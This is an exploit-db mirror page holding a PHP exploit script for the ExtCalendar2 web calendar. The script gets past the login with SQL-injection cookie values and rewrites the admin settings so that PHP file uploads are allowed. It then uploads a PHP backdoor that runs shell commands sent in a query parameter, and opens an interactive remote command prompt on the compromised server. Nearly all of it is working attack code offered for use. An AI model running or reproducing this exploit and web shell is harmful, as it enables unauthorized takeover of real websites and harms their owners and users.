exploit-db-mirror/exploits/php/webapps/17562.php
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

149 lines
No EOL
6.2 KiB
PHP
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?
if(!$argv[1])
die("
Usage : php exploit.php [site]
Example : php exploit.php http://site.tld/calendar/
");
print_r("
# Exploit....: [ ExtCalendar2 (Auth Bypass/Cookie) SQL Injection ]
# Author.....: [ Lagripe-Dz ]
# Date.......: [ 05-o6-2o11 ]
# Twitter ...: [ @Lagripe_Dz ]
# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]
# Download ..: [ http://sourceforge.net/projects/extcal/ ]
# Video .....: [ http://www.youtube.com/watch?v=2aatog92oqU ]
-==[ ExPloiT ]==-
javascript:document.cookie=\"ext20_username=admin ' or '1'= '1\";
javascript:document.cookie=\"ext20_password=admin ' or '1'= '1\";
-==[ Start ]==-
");
$target = $argv[1];
if(!extension_loaded("curl")){ die("error::cURL extension required"); }
# first get cookie prefix from page source ( xxx_username by default > ext20_username )
preg_match_all('#extcal_cookie_id = "(.*)"#', DzCURL($target,0,0) , $prf);
$prefix = $prf[1][0];
# header ..
$header[] = "Cookie: ".$prefix."_username=admin ' or '1'= '1; ".$prefix."_password=admin ' or '1'= '1;";
# check if it's work by looking for [ logout ]
echo (eregi("logout", DzCURL($target,0,$header))) ? "# Login :D\n":die("# Failed : Can't Login");
# data of new settings with allowed php extension
$new_settings = Array(
"calendar_name" => "Calendar name","calendar_description" => "Calendar description",
"calendar_admin_email" => "Calendar Administrator email","cookie_name" => "ext20",
"cookie_path" => "/","debug_mode" => 1,"calendar_status" => 1,"lang" => "english",
"charset" => "language-file","theme" => "default","timezone" => 1,"time_format_24hours" => 1,
"auto_daylight_saving" => 1,"main_table_width" => "50%","day_start" => 1,"default_view" => 1,
"search_view" => 1,"archive" => 1,"events_per_page" => 5,"sort_order" => "ta",
"show_recurrent_events" => 1,"multi_day_events" => "all","legend_cat_columns" => 5,
"allow_user_registration" => 1,"reg_duplicate_emails" => 1,"reg_email_verify" => 1,
"popup_event_mode" => 1,"popup_event_width" => 1,"popup_event_height" => 1,
"add_event_view" => 1,"addevent_allow_html" => 1,"addevent_allow_contact" => 1,
"addevent_allow_email" => 1,"addevent_allow_url" => 1,"addevent_allow_picture" => 1,
"new_post_notification" => 1,"monthly_view" => 1,"cal_view_show_week" => 1,
"cal_view_max_chars" => 100,"flyer_view" => 1,"flyer_show_picture" => 1,
"flyer_view_max_chars" => 100,"weekly_view" => 1,"weekly_view_max_chars" => 100,
"daily_view" => 1,"daily_view_max_chars" => 100,"cats_view" => 1,"cats_view_max_chars" => 100,
"mini_cal_def_picture" => 1,"mini_cal_diplay_options" => "default","mail_method" => "smtp",
"mail_smtp_host" => 0,"mail_smtp_auth" => 1,"mail_smtp_username" => 0,"mail_smtp_password" => 0,
"max_upl_dim" => 99999999999999999,"max_upl_size" => 99999999999999999,"picture_chmod" => 755,
"allowed_file_extensions" => "PHP/PY/PERL/HTACCESS/ASP/ASPX","update_config" => "Save New Configuration");
# post data and check if settings updated and php added
echo (eregi("<strong>.*</strong>", DzCURL($target."admin_settings.php",$new_settings,$header))) ? "# Settings Updated :D\n":die("# Failed : can't update settings");
# get event id for connect 2 backdoor
$events = DzCURL($target."admin_events.php?eventfilter=0",0,$header);
preg_match_all('#edit&id=(:?[0-9]+)#' ,$events ,$r );
# backdoor xD
$bd = "<?
echo Exe(base64_decode(\$_GET[dz]));
function Exe(\$command)
{
if(function_exists('passthru')){\$exec = passthru(\$command);}
elseif(function_exists('system') && !\$exec){\$exec= system(\$command); }
elseif(function_exists('exec') && !\$exec){exec(\$command,\$output);\$exec=join(\"\n\",\$output);}
elseif(function_exists('shell_exec') && !\$exec){\$exec=shell_exec(\$command);}
elseif(function_exists('popen') && !\$exec){\$fp = popen(\$command,\"r\");
{while(!feof(\$fp)){\$result.=fread(\$fp,1024);}pclose(\$fp);}\$exec = convert_cyr_string(\$result,\"d\",\"w\");}
elseif(function_exists('win_shell_execute') && !\$exec){\$exec = winshell(\$command);}
elseif(function_exists('win32_create_service') && !\$exec){\$exec=srvshell(\$command);}
elseif(extension_loaded('ffi') && !\$exec){\$exec=ffishell(\$command);}
elseif(extension_loaded('perl') && !\$exec){\$exec=perlshell(\$command);}
elseif(!\$exec) {\$exec = slashBypass(\$command);}
elseif(!\$exec && extension_loaded('python'))
{\$exec = python_eval(\"import os
pwd = os.getcwd()
print pwd
os.system('\".\$command.\"')\");}
elseif(\$exec){return \$exec;}
}
?>";
# make bd
file_put_contents("dz.php",$bd);
# new event with php backdoor
$post_bd = array(
"mode"=>"edit","id"=>$r[1][0],"title"=>"blabla",
"description"=>"bla bla bla ,,,","cat"=> 1,
"day"=> 22,"month"=> 11,"year"=>2011,
"picture"=>"@".realpath("dz.php"),
"submit"=>"  Update Event  ");
# post backdoor & check
echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");
@unlink("dz.php"); # del backdoor after uploading
# looking for backdoor
preg_match_all('#upload/(:?[a-z0-9]+)_dz.php#' ,DzCURL($target."admin_events.php?mode=view&id=".$r[1][0],0,$header) ,$r2 );
echo (!$r2[0][0]) ? die("# Failed : Backdoor not found !"):"";
# connecting with backdoor :P
while(1) {
fwrite(STDOUT, "\ncmd~# ");
// (trim((fgets(STDIN))) == "exit") ? exit:""; // exit from loop
$cmd = base64_encode(trim((fgets(STDIN))));
echo DzCURL($target.$r2[0][0]."?dz=".$cmd ,0,0);
}
# function ...
function DzCURL($url,$posts ,$header){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
if(is_array($header)){
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
}
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
if(is_array($posts)){
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$posts);
}
curl_setopt($curl,CURLOPT_TIMEOUT,5);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
# _EOF
?>